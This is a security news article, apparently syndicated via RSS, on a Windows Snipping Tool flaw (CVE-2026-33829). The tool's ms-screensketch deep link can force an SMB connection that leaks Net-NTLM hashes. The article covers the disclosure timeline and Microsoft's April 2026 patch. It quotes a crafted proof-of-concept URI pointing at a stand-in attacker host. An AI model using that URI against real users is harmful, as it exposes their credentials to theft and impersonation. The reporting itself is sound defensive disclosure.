By rssfeeds-admin 
Tracked as CVE-2026-33829, the issue was discovered by security researcher Margaruga from the BlackArrowSec Red Team and is documented in their redteam-research repository.
NTLM Leak via Deep Link Abuse
The flaw stems from a deep link protocol registered by the Snipping Tool application, identified as ms-screensketch.
This URI schema includes a parameter named filePath, which, when improperly validated, can coerce Windows into connecting to a remote SMB share.
As a result, the user’s Net-NTLM hash is transmitted to the attacker-controlled server.
In essence, the vulnerability enables an NTLM leak and an authentication spoofing scenario where sensitive credentials can be extracted across the network without direct access to the affected system.
Exploiting CVE-2026-33829 requires user interaction; however, even minimal engagement, such as opening a specially crafted link or visiting a malicious webpage, is enough to trigger the issue.
Security analysts at BlackArrowSec demonstrated that opening a crafted URI like:
textms-screensketch:edit?&filePath=\attacker.labimage.png&isTemporary=false&saved=true&source=ToastForces the Snipping Tool to initiate an SMB connection to the remote address, effectively disclosing the NTLM response from the current Windows account.
The vulnerability offers attackers strong social engineering opportunities. A threat actor could trick users into editing a supposedly legitimate image file, like a company wallpaper or ID photo, via malicious URLs such as:
texthttps://snip.example.com/wallpaper/image.pngWhile it seems to open locally in Snipping Tool, the app silently makes an NTLM authentication attempt in the background, exposing credentials.
Though the flaw requires user interaction, it poses a serious risk on enterprise networks where NTLM hash leakage can lead to impersonation or lateral movement.
Spoofing attacks leveraging NTLM responses often serve as a stepping stone for further credential abuse or privilege escalation.
Microsoft released a security update on April 14, 2026, addressing this vulnerability. Users are strongly advised to apply all patches included in the April 2026 Windows Security Update immediately.
- March 23, 2026: Vulnerability reported to Microsoft
- April 14, 2026: Vendor issued fix and public advisory
- April 15, 2026: Technical details published by BlackArrowSec
Further information and video proof-of-concept are available in the GitHub advisory and demo file CVE-2026-33829.mp4.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
The post Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.